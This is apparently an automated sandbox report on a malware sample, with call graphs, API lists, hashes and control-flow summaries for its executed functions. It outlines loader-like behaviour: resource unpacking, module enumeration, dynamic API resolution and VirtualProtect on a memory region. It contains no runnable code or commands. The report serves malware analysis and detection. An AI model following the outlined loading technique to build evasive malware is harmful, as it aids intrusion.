15229 414dd4 15226->15229 15271 417e7e 15226->15271 15228 40bfc1 __sopen_helper 62 API calls 15227->15228 15230 414d5e 15228->15230 15231 40bfc1 __sopen_helper 62 API calls 15229->15231 15233 40e744 __sopen_helper 6 API calls 15230->15233 15260 414d6e 15231->15260 15233->15260 15235 414db5 15237 414e12 15235->15237 15238 414de7 15235->15238 15239 414dcb 15235->15239 15237->15260 15282 414c98 15237->15282 15241 411c75 __malloc_crt 62 API calls 15238->15241 15238->15260 15242 40eeab ___wtomb_environ 119 API calls 15239->15242 15244 414df7 15241->15244 15245 414dd0 15242->15245 15244->15237 15251 411c75 __malloc_crt 62 API calls 15244->15251 15244->15260 15245->15229 15245->15237 15246 414e8f 15247 414f7a 15246->15247 15252 414e98 15246->15252 15250 40b6b5 __read_nolock 62 API calls 15247->15250 15248 414e41 15249 40b6b5 __read_nolock 62 API calls 15248->15249 15255 414e4b 15249->15255 15250->15260 15251->15237 15253 411d54 __recalloc_crt 73 API calls 15252->15253 15252->15260 15256 414e51 _strlen 15253->15256 15254 414f5e 15258 40b6b5 __read_nolock 62 API calls 15254->15258 15254->15260 15255->15256 15286 411d54 15255->15286 15256->15254 15259 411cba __calloc_crt 62 API calls 15256->15259 15256->15260 15258->15260 15261 414efb _strlen 15259->15261 15260->15220 15261->15254 15262 40ef42 _strcpy_s 62 API calls 15261->15262 15263 414f14 15262->15263 15264 414f28 SetEnvironmentVariableA 15263->15264 15265 40e61c __invoke_watson 10 API calls 15263->15265 15266 414f49 15264->15266 15267 414f52 15264->15267 15268 414f25 15265->15268 15269 40bfc1 __sopen_helper 62 API calls 15266->15269 15270 40b6b5 __read_nolock 62 API calls 15267->15270 15268->15264 15269->15267 15270->15254 15291 417dc2 15271->15291 15273 414d89 15273->15229 15273->15235 15274 414cea 15273->15274 15275 414cfb 15274->15275 15279 414d3b 15274->15279 15276 411cba __calloc_crt 62 API calls 15275->15276 15278 414d12 15276->15278 15277 414d24 15277->15279 15298 417d6d 15277->15298 15278->15277 15280 40e79a __amsg_exit 62 API calls 15278->15280 15279->15235 15280->15277 15285 414ca6 15282->15285 15283 40edfb __fassign 106 API calls 15283->15285 15284 414ccd 15284->15246 15284->15248 15285->15283 15285->15284 15289 411d5d 15286->15289 15288 411da0 15288->15256 15289->15288 15290 411d81 Sleep 15289->15290 15306 40b783 15289->15306 15290->15289 15292 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 15291->15292 15293 417dd6 15292->15293 15294 40bfc1 __sopen_helper 62 API calls 15293->15294 15297 417df4 __mbschr_l 15293->15297 15295 417de4 15294->15295 15296 40e744 __sopen_helper 6 API calls 15295->15296 15296->15297 15297->15273 15299 417d7e _strlen 15298->15299 15305 417d7a 15298->15305 15300 40b84d _malloc 62 API calls 15299->15300 15301 417d91 15300->15301 15302 40ef42 _strcpy_s 62 API calls 15301->15302 15301->15305 15303 417da3 15302->15303 15304 40e61c __invoke_watson 10 API calls 15303->15304 15303->15305 15304->15305 15305->15277 15307 40b792 15306->15307 15308 40b7ba 15306->15308 15307->15308 15310 40b79e 15307->15310 15309 40b7cf 15308->15309 15311 40e56a __msize 63 API calls 15308->15311 15312 40e34f _realloc 71 API calls 15309->15312 15313 40bfc1 __sopen_helper 62 API calls 15310->15313 15311->15309 15316 40b7b3 _memset 15312->15316 15314 40b7a3 15313->15314 15315 40e744 __sopen_helper 6 API calls 15314->15315 15315->15316 15316->15289 15318 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 15317->15318 15319 40ed21 15318->15319 15320 40ed42 15319->15320 15322 40ed75 15319->15322 15334 40ed2a 15319->15334 15321 40bfc1 __sopen_helper 62 API calls 15320->15321 15325 40ed47 15321->15325 15323 40ed99 15322->15323 15324 40ed7f 15322->15324 15327 40eda1 15323->15327 15328 40edb5 15323->15328 15326 40bfc1 __sopen_helper 62 API calls 15324->15326 15329 40e744 __sopen_helper 6 API calls 15325->15329 15330 40ed84 15326->15330 15335 414b9e 15327->15335 15355 414b5c 15328->15355 15329->15334 15333 40e744 __sopen_helper 6 API calls 15330->15333 15333->15334 15334->15207 15336 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 15335->15336 15337 414bb2 15336->15337 15338 414bd3 15337->15338 15340 414c06 15337->15340 15353 414bbb 15337->15353 15339 40bfc1 __sopen_helper 62 API calls 15338->15339 15341 414bd8 15339->15341 15342 414c10 15340->15342 15343 414c2a 15340->15343 15346 40e744 __sopen_helper 6 API calls 15341->15346 15347 40bfc1 __sopen_helper 62 API calls 15342->15347 15344 414c34 15343->15344 15345 414c49 15343->15345 15360 417c1d 15344->15360 15349 414b5c ___crtCompareStringA 95 API calls 15345->15349 15346->15353 15350 414c15 15347->15350 15351 414c63 15349->15351 15352 40e744 __sopen_helper 6 API calls 15350->15352 15351->15353 15354 40bfc1 __sopen_helper 62 API calls 15351->15354 15352->15353 15353->15334 15354->15353 15356 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 15355->15356 15357 414b6f 15356->15357 15376 4147ec 15357->15376 15361 417c33 15360->15361 15374 417c58 ___ascii_strnicmp 15360->15374 15362 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 15361->15362 15363 417c3e 15362->15363 15364 417c43 15363->15364 15365 417c78 15363->15365 15366 40bfc1 __sopen_helper 62 API calls 15364->15366 15367 417c82 15365->15367 15375 417caa 15365->15375 15368 417c48 15366->15368 15369 40bfc1 __sopen_helper 62 API calls 15367->15369 15370 40e744 __sopen_helper 6 API calls 15368->15370 15371 417c87 15369->15371 15370->15374 15372 40e744 __sopen_helper 6 API calls 15371->15372 15372->15374 15373 4168fc 97 API calls __tolower_l 15373->15375 15374->15353 15375->15373 15375->15374 15377 414818 CompareStringW 15376->15377 15381 41482f strncnt 15376->15381 15378 41483b GetLastError 15377->15378 15377->15381 15378->15381 15379 40ce09 ___convertcp 5 API calls 15382 414b5a 15379->15382 15380 414a95 15384 417a20 ___ansicp 86 API calls 15380->15384 15381->15380 15383 4148a4 15381->15383 15402 414881 15381->15402 15382->15334 15385 414962 MultiByteToWideChar 15383->15385 15389 4148e6 GetCPInfo 15383->15389 15383->15402 15387 414abb 15384->15387 15396 414982 15385->15396 15385->15402 15386 414b1c CompareStringA 15388 414b3a 15386->15388 15386->15402 15387->15386 15390 417a69 ___convertcp 69 API calls 15387->15390 15387->15402 15391 40b6b5 __read_nolock 62 API calls 15388->15391 15392 4148f7 15389->15392 15389->15402 15393 414ae0 15390->15393 15394 414b40 15391->15394 15392->15385 15392->15402 15401 417a69 ___convertcp 69 API calls 15393->15401 15393->15402 15398 40b6b5 __read_nolock 62 API calls 15394->15398 15395 4149d9 MultiByteToWideChar 15399 4149f2 MultiByteToWideChar 15395->15399 15400 414a83 15395->15400 15397 40b84d _malloc 62 API calls 15396->15397 15405 41499f ___convertcp 15396->15405 15397->15405 15398->15402 15399->15400 15410 414a09 15399->15410 15404 4147ae __freea 62 API calls 15400->15404 15403 414b01 15401->15403 15402->15379 15406 414b16 15403->15406 15407 414b0a 15403->15407 15404->15402 15405->15395 15405->15402 15406->15386 15408 40b6b5 __read_nolock 62 API calls 15407->15408 15408->15402 15409 414a53 MultiByteToWideChar 15412 414a66 CompareStringW 15409->15412 15413 414a7d 15409->15413 15411 40b84d _malloc 62 API calls 15410->15411 15414 414a1f ___convertcp 15410->15414 15411->15414 15412->15413 15415 4147ae __freea 62 API calls 15413->15415 15414->15400 15414->15409 15415->15400 15416->15211 15423 40d0f5 15417->15423 15420 40cd39 15421 40cd6e RaiseException 15420->15421 15422 40cd62 15420->15422 15421->15172 15422->15421 15424 40d115 _strlen 15423->15424 15428 40af59 15423->15428 15425 40b84d _malloc 62 API calls 15424->15425 15424->15428 15426 40d128 15425->15426 15427 40ef42 _strcpy_s 62 API calls 15426->15427 15426->15428 15427->15428 15428->15420 15430 4017e9 15429->15430 15431 401844 15430->15431 15433 40b783 __recalloc 72 API calls 15430->15433 15435 40182d 15430->15435 15436 40186d MultiByteToWideChar 15431->15436 15439 40b743 15431->15439 15433->15435 15434 40b6b5 __read_nolock 62 API calls 15434->15431 15435->15431 15435->15434 15436->15178 15436->15179 15438 40103a 15437->15438 15440 40e231 __calloc_impl 62 API calls 15439->15440 15441 40b75d 15440->15441 15442 40bfc1 __sopen_helper 62 API calls 15441->15442 15445 40b779 15441->15445 15443 40b770 15442->15443 15444 40bfc1 __sopen_helper 62 API calls 15443->15444 15443->15445 15444->15445 15445->15431 15447 40b6b5 __sopen_helper 15446->15447 15448 40b73d __sopen_helper 15447->15448 15449 40b714 HeapFree 15447->15449 15448->15193 15449->15448 15450 40b727 15449->15450 15451 40bfc1 __sopen_helper 62 API calls 15450->15451 15451->15448 15453 40aff8 15452->15453 15454 40b01f __VEC_memcpy 15453->15454 15455 40b027 15453->15455 15454->15455 15455->15202 15457 4104e0 _doexit 6 API calls 15456->15457 15458 40ea5c __init_pointers __initp_misc_winsig 15457->15458 15473 41393d 15458->15473 15461 41046e __encode_pointer 6 API calls 15462 40ea98 15461->15462 15462->14250 15466 40d56f 15463->15466 15464 41389c __getstream InitializeCriticalSectionAndSpinCount 15464->15466 15465 40d59d 15465->14240 15465->14260 15466->15464 15466->15465 15468 4105a2 15467->15468 15472 4105ae 15467->15472 15471 4104e9 __decode_pointer 6 API calls 15468->15471 15469 4105d0 15469->15469 15470 4105c2 TlsFree 15470->15469 15471->15472 15472->15469 15472->15470 15474 41046e __encode_pointer 6 API calls 15473->15474 15475 40ea8e 15474->15475 15475->15461 15479 41265c 15476->15479 15478 4126c9 15480 4127c7 15478->15480 15481 416836 72 API calls _parse_cmdline 15478->15481 15479->15478 15482 416836 15479->15482 15480->14283 15480->14284 15481->15478 15485 4167e3 15482->15485 15486 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 15485->15486 15487 4167f6 15486->15487 15487->15479 15489 40e8ea __sopen_helper 15488->15489 15490 40d6e0 __lock 62 API calls 15489->15490 15491 40e8f1 15490->15491 15493 4104e9 __decode_pointer 6 API calls 15491->15493 15497 40e9aa __initterm 15491->15497 15495 40e928 15493->15495 15495->15497 15499 4104e9 __decode_pointer 6 API calls 15495->15499 15496 40e9f2 __sopen_helper 15496->14289 15505 40e9f5 15497->15505 15503 40e93d 15499->15503 15500 40e9e9 15501 40e7ee _doexit 3 API calls 15500->15501 15501->15496 15502 4104e0 6 API calls _doexit 15502->15503 15503->15497 15503->15502 15504 4104e9 6 API calls __decode_pointer 15503->15504 15504->15503 15506 40e9fb 15505->15506 15508 40e9d6 15505->15508 15510 40d606 LeaveCriticalSection 15506->15510 15508->15496 15509 40d606 LeaveCriticalSection 15508->15509 15509->15500 15510->15508

                                                      Executed Functions

                                                      Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 34 401cd0-401cd4 24->34 30 401ef3-401f1a call 401300 SizeofResource 26->30 27->30 41 401f1c-401f2f 30->41 42 401f5f-401f69 30->42 35 401cf0-401cf2 34->35 36 401cd6-401cd8 34->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 48 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->48 49 401f77-401f8d call 401560 43->49 44->43 45->34 45->39 46->7 50 401d0f 46->50 47->42 48->5 85 4021aa-4021c0 48->85 49->48 54 401d10-401d2e call 401650 50->54 61 401d30-401d34 54->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 65 401d55-401d57 63->65 67 401d3a-401d40 64->67 68 401d4c-401d4e 64->68 65->25 69 401d5d-401d7b call 401650 65->69 67->63 71 401d42-401d4a 67->71 68->65 76 401d80-401d84 69->76 71->61 71->68 78 401da0-401da2 76->78 79 401d86-401d88 76->79 84 401da5-401da7 78->84 82 401d8a-401d90 79->82 83 401d9c-401d9e 79->83 82->78 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->76 86->83 87->7 87->54 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 70d01c 122->154 155 40234e call 70d01d 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 70d01c 135->152 153 402390 call 70d01d 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 004019FD
                                                      • _getenv.LIBCMT ref: 00401ABA
                                                      • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                      • Module32First.KERNEL32 ref: 00401C48
                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                      • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                      • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                      • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                      • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                      • _malloc.LIBCMT ref: 00401EBA
                                                      • _memset.LIBCMT ref: 00401EDD
                                                      • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                      • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                      • API String ID: 2366190142-2962942730
                                                      • Opcode ID: 224088bd6fdf40f00aacdd5f7db7c03047c3cc993abb63ba2c7175de51848a6e
                                                      • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                      • Opcode Fuzzy Hash: 224088bd6fdf40f00aacdd5f7db7c03047c3cc993abb63ba2c7175de51848a6e
                                                      • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 156 4018f0-4018fa 157 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 156->157 158 4018fc-401900 156->158 161 401940-401949 GetLastError 157->161 162 401996-40199a 157->162 163 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 161->163 164 40198d-40198f 161->164 163->164 164->162 165 401991 call 401030 164->165 165->162
                                                      APIs
                                                      • lstrlenA.KERNEL32(?), ref: 00401906
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                      • GetLastError.KERNEL32 ref: 00401940
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                      • String ID:
                                                      • API String ID: 3322701435-0
                                                      • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                      • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                      • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                      • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 169 40af66-40af6e 170 40af7d-40af88 call 40b84d 169->170 173 40af70-40af7b call 40d2e3 170->173 174 40af8a-40af8b 170->174 173->170 177 40af8c-40af98 173->177 178 40afb3-40afca call 40af49 call 40cd39 177->178 179 40af9a-40afb2 call 40aefc call 40d2bd 177->179 179->178
                                                      APIs
                                                      • _malloc.LIBCMT ref: 0040AF80
                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                        • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                      • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1411284514-0
                                                      • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                      • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                      • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                      • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02219378 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 188 2219378-22193f9 VirtualProtect 191 2219402-2219427 188->191 192 22193fb-2219401 188->192 192->191
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 022193EC
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1460105468.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_2210000_NaE.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: c47d66474298f7e4d978c403ca2aca8e7395b353cfc02538e566a043db84a7bd
                                                      • Instruction ID: 729cbd5943fc968433636a2fab3a201e96927928943cc4289b05134b74b68f9c
                                                      • Opcode Fuzzy Hash: c47d66474298f7e4d978c403ca2aca8e7395b353cfc02538e566a043db84a7bd
                                                      • Instruction Fuzzy Hash: 6211F4B19002499FDB10DFAAC885BDFFBF4AF48210F14842AE419A7250C775A941CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02219548 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 196 2219548-22195b7 FindCloseChangeNotification 199 22195c0-22195e5 196->199 200 22195b9-22195bf 196->200 200->199
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE ref: 022195AA
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1460105468.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_2210000_NaE.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: 537f841dfd8137d5337831d30400593e4d482c1e3ac56c8d4fce3ad7c20592e6
                                                      • Instruction ID: 1a9c6e3a1b6281ec68ac4dcfd7cdeaf7d9da9c9a1f742decb028ae850549abe9
                                                      • Opcode Fuzzy Hash: 537f841dfd8137d5337831d30400593e4d482c1e3ac56c8d4fce3ad7c20592e6
                                                      • Instruction Fuzzy Hash: 4A113AB1D003498FDB10DFAAC4457DFFBF4AF88214F14841AD419A7240C775A944CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 204 401870-401883 call 40af66 207 4018b2 204->207 208 401885-4018a2 SysAllocString 204->208 209 4018b4-4018b8 207->209 208->209 210 4018a4-4018a6 208->210 212 4018c4-4018c9 209->212 213 4018ba-4018bf call 40ad90 209->213 210->209 211 4018a8-4018ad call 40ad90 210->211 211->207 213->212
                                                      APIs
                                                        • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                      • SysAllocString.OLEAUT32 ref: 00401898
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: AllocString_malloc
                                                      • String ID:
                                                      • API String ID: 959018026-0
                                                      • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                      • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                      • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                      • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 216 40d534-40d556 HeapCreate 217 40d558-40d559 216->217 218 40d55a-40d563 216->218
                                                      APIs
                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1458865533.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.1458822861.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458890380.000000000041B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000426000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000004.00000002.1458924352.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NaE.jbxd
                                                      Similarity
                                                      • API ID: CreateHeap
                                                      • String ID:
                                                      • API String ID: 10892065-0
                                                      • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                      • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                      • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                      • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0070D4D8 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
